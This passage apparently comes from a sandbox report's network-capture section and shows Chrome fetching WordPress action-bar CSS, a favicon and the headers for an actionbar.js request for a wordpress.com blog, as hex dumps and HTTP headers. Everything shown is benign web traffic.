                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 65 6c 6c 69 70 73 69 73 2e 61 63 74 6e 62 72 2d 68 69 64 64 65 6e 3e 2e 67 72 69 64 69 63 6f 6e 3a 68 6f 76 65 72 7b 66 69 6c 6c 3a 23 33 63 34 33 34 61 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 65 6c 6c 69 70 73 69 73 20 2e 74 69 70 2d 69 6e 6e 65 72 20 2e 67 72 69 64 69 63 6f 6e 7b 6d 61 72 67 69 6e 3a 30 20 35 70 78 20 30 20 30 3b 76 65 72 74
                                                                                                                                                                                                                                                                  Data Ascii: sform:rotate(0);-moz-transform:rotate(0);-o-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0)}div#actionbar .actnbr-ellipsis.actnbr-hidden>.gridicon:hover{fill:#3c434a}div#actionbar .actnbr-ellipsis .tip-inner .gridicon{margin:0 5px 0 0;vert
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 35 30 25 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 31 30 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 70 6f 70 6f 76 65 72 20 2e 74 69 70 2d 69 6e 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 63 64 63 64 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 35 70 78 20 72 67 62
                                                                                                                                                                                                                                                                  Data Ascii: 50%;margin-left:-10px;border-top-style:solid;border-bottom:none;border-left-color:transparent;border-right-color:transparent}div#actionbar .actnbr-popover .tip-inner{background-color:#fff;border:1px solid #dcdcde;border-radius:4px;box-shadow:0 2px 5px rgb
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 2d 66 6f 6c 6c 6f 77 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 66 30 66 30 66 30 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 6e 6f 74 69 63 65 20 2e 61 63 74 6e 62 72 2d 66 6f 6c 6c 6f 77 2d 63 6f 75 6e 74 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 65 6c 6c 69 70 73 69 73 20 6c 69 20 61 3a 68 6f 76 65 72 20 2e 67 72 69 64 69 63 6f 6e 7b 66 69 6c 6c 3a 23 66 66 66 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 65 6c 6c 69 70 73 69 73 20 6c 69 20 2e 61 63 74 6e 62 72 2d 61 63 74
                                                                                                                                                                                                                                                                  Data Ascii: -follow{border-bottom:1px solid #f0f0f0;padding-bottom:10px;margin-bottom:10px}div#actionbar .actnbr-notice .actnbr-follow-count{margin-bottom:10px}div#actionbar .actnbr-ellipsis li a:hover .gridicon{fill:#fff}div#actionbar .actnbr-ellipsis li .actnbr-act
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 75 74 6f 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 6e 6f 74 69 63 65 20 66 6f 72 6d 20 62 75 74 74 6f 6e 5b 64 69 73 61 62 6c 65 64 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 62 63 65 65 66 64 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 63 64 63 64 65 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 6e 6f 74 69 63 65 20 2e 61 63 74 6e 62 72 2d 62 75 74 74 6f 6e 2d 77 72 61 70 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e
                                                                                                                                                                                                                                                                  Data Ascii: ;text-transform:none;-webkit-font-smoothing:auto;height:auto;width:100%}div#actionbar .actnbr-notice form button[disabled]{background:#bceefd;border-color:#dcdcde;color:#fff}div#actionbar .actnbr-notice .actnbr-button-wrap{text-align:right}div#actionbar .
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 65 6c 6c 69 70 73 69 73 20 6c 69 2e 61 63 74 6e 62 72 2d 66 6f 6c 64 65 64 2d 63 75 73 74 6f 6d 69 7a 65 20 61 2c 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 65 6c 6c 69 70 73 69 73 20 6c 69 2e 61 63 74 6e 62 72 2d 66 6f 6c 64 65 64 2d 66 6f 6c 6c 6f 77 20 61 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 2e 61 63 74 6e 62 72 2d 66 6f 6c 64 65 64 2e 61 63 74 6e 62 72 2d 68 61 73 2d 63 75 73 74 6f 6d 69 7a 65 2e 61 63 74 6e 62 72 2d 68 61 73 2d 65 64 69 74 20 2e 61 63 74 6e 62 72 2d 65 6c 6c 69 70 73 69 73 20 6c 69 2e 61 63 74 6e 62 72 2d
                                                                                                                                                                                                                                                                  Data Ascii: {display:none}div#actionbar .actnbr-ellipsis li.actnbr-folded-customize a,div#actionbar .actnbr-ellipsis li.actnbr-folded-follow a{align-items:center;display:flex}div#actionbar.actnbr-folded.actnbr-has-customize.actnbr-has-edit .actnbr-ellipsis li.actnbr-
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 66 6f 6c 6c 6f 77 2d 62 75 62 62 6c 65 20 2e 61 63 74 6e 62 72 2d 73 69 74 65 2d 73 65 74 74 69 6e 67 73 5f 5f 73 65 74 74 69 6e 67 20 6c 61 62 65 6c 2e 63 6f 6d 70 6f 6e 65 6e 74 73 2d 74 6f 67 67 6c 65 2d 63 6f 6e 74 72 6f 6c 5f 5f 6c 61 62 65 6c 7b 63 6f 6c 6f 72 3a 23 32 65 34 34 35 33 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 66 6f 6c
                                                                                                                                                                                                                                                                  Data Ascii: ex;flex-direction:row;align-items:center}div#actionbar .actnbr-follow-bubble .actnbr-site-settings__setting label.components-toggle-control__label{color:#2e4453;margin:0;font-style:normal;font-size:14px;font-weight:300;width:100%}div#actionbar .actnbr-fol
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC1369INData Raw: 6c 6f 77 2d 62 75 62 62 6c 65 20 2e 61 63 74 6e 62 72 2d 73 69 74 65 2d 73 65 74 74 69 6e 67 73 5f 5f 74 6f 67 67 6c 65 2e 69 73 2d 63 68 65 63 6b 65 64 20 73 70 61 6e 2e 61 63 74 6e 62 72 2d 73 69 74 65 2d 73 65 74 74 69 6e 67 73 5f 5f 74 6f 67 67 6c 65 5f 5f 74 68 75 6d 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 31 38 70 78 29 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 61 63 74 6e 62 72 2d 73 69 74 65 2d 73 65 74 74 69 6e 67 73 5f 5f 74 6f 67 67 6c 65 5f 5f 69 6e 70 75 74 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 3a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 22 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72
                                                                                                                                                                                                                                                                  Data Ascii: low-bubble .actnbr-site-settings__toggle.is-checked span.actnbr-site-settings__toggle__thumb{background-color:#fff;border-width:0;transform:translateX(18px)}div#actionbar .actnbr-site-settings__toggle__input[type=checkbox]::before{content:""}div#actionbar


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  36192.168.2.1649748192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC590OUTGET /i/favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s1.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC495INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:44 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/x-icon
                                                                                                                                                                                                                                                                  Content-Length: 15406
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Last-Modified: Thu, 18 Apr 2024 07:27:55 GMT
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  ETag: "6620cb7b-3c2e"
                                                                                                                                                                                                                                                                  Expires: Fri, 18 Apr 2025 07:30:10 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 1
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC874INData Raw: 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 28 11 00 00 9e 04 00 00 30 30 00 00 01 00 20 00 68 26 00 00 c6 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 01 ec 5b 3a 35 e9 58 39 99 e9 58 38 d9 e9 59 38 f9 e9 59 38 f9 e9 58 38 db e9 58 39 99 e7 57 3a 35 ff ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ea 55 40 0c e8 59 38 9a e9 59 38 f9 e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 38 fa e9 58 39 99 eb 4e 3b 0d 00 00 00 00 00 00 00 00 00 00 00 00 eb 62 3b 0d e9 58 39 bc e9 58 38 ff e9 58 38 ff ec 75 5b ff f3 ab 9b ff f5 b6 a8 ff f5
                                                                                                                                                                                                                                                                  Data Ascii: h6 (00 h&( [:5X9X8Y8Y8X8X9W:5U@Y8Y8X8X8X8X8X8X8Y8X9N;b;X9X8X8u[
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: e9 5c 3c ff f3 ab 9b ff f3 a5 94 ff eb 68 4c ff e9 5b 3b ff e9 5b 3b ff eb 68 4c ff f3 a5 94 ff f3 ad 9d ff e9 5c 3c ff e9 58 38 ff e8 58 39 99 ff ff 00 01 00 00 00 00 ea 55 40 0c e9 58 39 bc e9 58 38 ff e9 59 39 ff ed 79 60 ff f4 ad 9e ff f5 b6 a9 ff f5 b8 ab ff f4 ad 9d ff ed 76 5c ff e9 59 39 ff e9 58 38 ff e9 58 39 bc eb 62 3b 0d 00 00 00 00 00 00 00 00 00 00 00 00 eb 62 3b 0d eb 59 39 98 e9 59 38 fa e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 38 f9 e8 59 38 9a ea 55 40 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 01 e7 57 3a 35 e9 58 39 99 e9 58 38 db e9 58 38 f9 e9 58 38 f9 e9 58 38 d9 e9 58 39 99 ec 5b 3a 35 ff ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: \<hL[;[;hL\<X8X9U@X9X8Y9y`v\Y9X8X9b;b;Y9Y8X8X8X8X8X8X8Y8Y8U@W:5X9X8X8X8X8X9[:5
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 00 00 00 00 00 00 00 e5 5c 38 32 e8 58 38 ed e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 5f 41 ff f7 c3 b8 ff fa da d3 ff ec 76 5c ff ed 7b 62 ff fe f6 f5 ff ff ff ff ff fb e3 dd ff ea 62 43 ff e9 58 38 ff e9 58 38 ff e9 59 39 ff f1 9b 88 ff fe fc fb ff ff ff ff ff f7 ca bf ff ed 79 5f ff fa da d3 ff f7 c6 bb ff e9 5f 41 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 39 ea e8 5b 3b 38 00 00 00 00 ff 66 33 05 e8 5a 3a 9b e9 58 38 fe e9 58 38 ff e9 58 38 ff e9 5a 3a ff f2 a5 93 ff fb e0 da ff ec 74 5a ff e9 5a 3a ff f4 b0 a0 ff ff fe fe ff ff fe fd ff fd ef ed ff ef 85 6e ff e9 58 38 ff e9 58 38 ff ea 5e 3f ff f8 d1 c9 ff ff ff ff ff ff fe fe ff fc eb e7 ff eb 6d 51 ff ec 76 5c ff fa de d8 ff f2 a3 91 ff e9 5a 3a ff e9 58 38 ff e9 58 38 ff e9 58 38 fe e9 59 39 98
                                                                                                                                                                                                                                                                  Data Ascii: \82X8X8X8X8_Av\{bbCX8X8Y9y__AX8X8X8Y9[;8f3Z:X8X8X8Z:tZZ:nX8X8^?mQv\Z:X8X8X8Y9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 39 ff f2 a1 8f ff fe fd fc ff fd f2 f0 ff ec 75 5a ff fc e7 e3 ff ee 84 6c ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 39 cf ea 59 38 9b e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 67 49 ff fb e5 e0 ff f4 b1 a3 ff fe f7 f6 ff ff ff ff ff fe f6 f4 ff ed 76 5c ff e9 58 38 ff e9 58 38 ff e9 59 39 ff f2 a0 8e ff fe fd fc ff ff ff ff ff fb e1 db ff ea 61 43 ff e9 58 38 ff e9 58 38 ff eb 6c 4f ff fb e3 de ff ff ff ff ff fe f7 f5 ff f3 a7 97 ff fb e5 e0 ff ea 65 47 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 9f ea 5a 39 63 ea 59 38 fa e9 58 38 ff e9 58 38 ff e9 5a 3b ff f5 b4 a6 ff fd f8 f7 ff ff fe fe ff ff ff ff ff fb e2 dc ff ec 74 59 ff e9 5b 3c ff e9 5d 3d ff ec 74 59 ff f9 d7 d0 ff ff ff ff ff ff ff ff ff f7 c3 b8 ff eb 6b 4e ff e9 59 39 ff e9 5a 3a ff f3
                                                                                                                                                                                                                                                                  Data Ascii: 9uZlX8X8X8Y9Y8X8X8X8gIv\X8X8Y9aCX8X8lOeGX8X8X8X8Z9cY8X8X8Z;tY[<]=tYkNY9Z:
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 fe e9 59 39 ea e9 59 38 8c e9 59 37 17 ff 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc 66 33 05 e5 57 38 32 ea 59 3a 9b ea 59 39 ea e9 59 38 fa e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 59 38 fa ea 59 39 e6 e9 59 39 98 e8 5b 3b 38 ff 66 33 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 66 33 05 ef 5a 3a 1f ea 58
                                                                                                                                                                                                                                                                  Data Ascii: X8X8X8X8X8X8X8X8X8X8X8Y9Y8Y7f3W82Y:Y9Y8X8X8X8X8X8X8X8X8Y8Y9Y9[;8f3f3Z:X
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 01 ea 55 40 0c e5 57 3a 4f e9 58 39 b0 ea 59 39 ee ea 59 39 fc e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 38 fd e9 59 38 ec ea 58 39 aa eb 58 38 4e eb 62 3b 0d ff 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ed 5b 37
                                                                                                                                                                                                                                                                  Data Ascii: U@W:OX9Y9Y9X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8Y8Y8X9X8Nb;[7
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 5d 46 0b e6 57 38 7b e9 59 38 ec e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 5a 3b ff ec 77 5d ff f8 cd c3 ff fc ee eb ff f7 c5 b9 ff ee 81 69 ff f2 9f 8e ff fd f0 ed ff ff ff ff ff fd f4 f2 ff f1 99 85 ff e9 5c 3d ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 64 47 ff f5 ba ac ff fe fb fb ff ff fe fe ff fc ec e8 ff f2 a5 94 ff f7 c5 bb ff fc ed e9 ff f8 cb c1 ff ec 77 5d ff e9 5b 3b ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 59 39 ee e7 57 39 75 d4 55 40 0c 00 00 00 00 00 00 00 00 00 00 00 00 ff 55 55 03 e3 5a 39 36 e9 58 38 d9 e9 59 38 fd e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 3a ff ec 73 59 ff f8 cb c1 ff fd f1 ee ff f6 be b2 ff
                                                                                                                                                                                                                                                                  Data Ascii: ]FW8{Y8X8X8X8X8X8Z;w]i\=X8X8X8X8X8dGw][;X8X8X8X8X8Y9W9uU@UUZ96X8Y8X8X8X8X8Y:sY
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 38 ff e9 58 38 ff e9 5b 3c ff f1 9c 89 ff fc ed e9 ff f4 b4 a6 ff ea 62 43 ff e9 58 38 ff e9 59 39 ff eb 6e 52 ff f9 d8 d1 ff ff fe fe ff ff ff ff ff ff fd fd ff f9 d2 ca ff eb 6c 4f ff ea 5f 40 ff f3 a5 94 ff f7 c5 ba ff ec 6d 51 ff e9 5a 3b ff f0 8d 78 ff fc eb e8 ff ff ff ff ff ff ff ff ff fe f7 f5 ff f3 a6 95 ff ea 61 42 ff ed 7b 62 ff fc e6 e1 ff f4 ac 9b ff ea 5f 40 ff e9 58 38 ff ea 60 42 ff f4 b3 a4 ff fb ed e9 ff f2 9d 8a ff e9 5c 3c ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 f0 ec 5a 39 5e e9 59 39 98 e9 58 38 f6 e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 63 45 ff f5 b9 ab ff fc ed ea ff ef 85 6f ff e9 5b 3c ff e9 58 38 ff e9 5b 3b ff f0 8e 79 ff fc eb e8 ff ff ff ff ff ff ff ff ff fe f7 f6 ff f3 a8 98 ff ea 5f 40 ff e9
                                                                                                                                                                                                                                                                  Data Ascii: 8X8[<bCX8Y9nRlO_@mQZ;xaB{b_@X8`B\<X8X8X8X8X8Z9^Y9X8X8X8X8X8cEo[<X8[;y_@
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: ff f3 a5 94 ff fe f7 f5 ff ff ff ff ff ff ff ff ff fe f6 f4 ff f3 a5 94 ff e9 5d 3e ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 39 ff eb 6c 50 ff f8 cd c3 ff ff fc fc ff ff ff ff ff ff ff ff ff fb e4 df ff ee 81 69 ff e9 5a 3a ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 60 41 ff f5 b3 a5 ff ff fb fb ff fa dd d7 ff ed 76 5c ff ea 60 42 ff f4 ae 9f ff fc e6 e2 ff ee 7e 65 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 fe e9 59 39 f2 e9 59 39 dc e9 58 39 fc e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ed 79 5f ff fa df d9 ff f7 c3 b6 ff ea 63 45 ff ea 68 4b ff f8 d0 c8 ff ff fd fd ff ff ff ff ff ff ff ff ff fc e7 e3 ff ef 85 6f ff e9 5a 3a ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 5a 3a ff ef 88 71 ff fb e8 e4 ff ff ff ff ff ff ff ff ff ff fe
                                                                                                                                                                                                                                                                  Data Ascii: ]>X8X8X8Y9lPiZ:X8X8X8`Av\`B~eX8X8X8X8X8Y9Y9X9X8X8X8X8y_cEhKoZ:X8X8X8Z:q
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC1369INData Raw: ea 61 43 ff eb 6b 4f ff f4 ac 9c ff f5 b7 aa ff f4 b3 a4 ff f4 aa 9b ff f4 a9 9a ff f4 aa 9a ff f4 ad 9e ff f4 b4 a6 ff f5 b4 a5 ff ee 81 6a ff e9 5a 3a ff e9 5a 3b ff f1 95 82 ff fd f0 ed ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe fd fc ff fa df d9 ff ed 7a 60 ff e9 5a 3a ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 59 38 f4 e9 5a 39 7d e3 55 39 09 ff 80 00 02 ed 5b 37 38 e9 58 38 d0 ea 58 38 fe e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 5e 3f ff f2 a1 8f ff fc eb e7 ff f7 c6 ba ff ec 74 5a ff ea 60 42 ff ea 60 42 ff ea 61 43 ff e9 5f 40 ff e9 59 39 ff e9 5a 3b ff ea 61 42 ff ea 61 43 ff ea 60 42 ff ea 5f 40 ff ea 5f 40 ff ea 5f 40 ff ea 5f 41 ff ea 61 43 ff ea 61 43 ff e9 5c 3d ff e9 58 38 ff e9 5a 3a ff f0 8d 77 ff fc e9 e6
                                                                                                                                                                                                                                                                  Data Ascii: aCkOjZ:Z;z`Z:X8X8X8X8Y8Z9}U9[78X8X8X8X8X8X8^?tZ`B`BaC_@Y9Z;aBaC`B_@_@_@_AaCaC\=X8Z:w


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  37192.168.2.1649747192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC572OUTGET /wp-content/mu-plugins/actionbar/actionbar.js?v=20231122 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s0.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC481INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:44 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/javascript
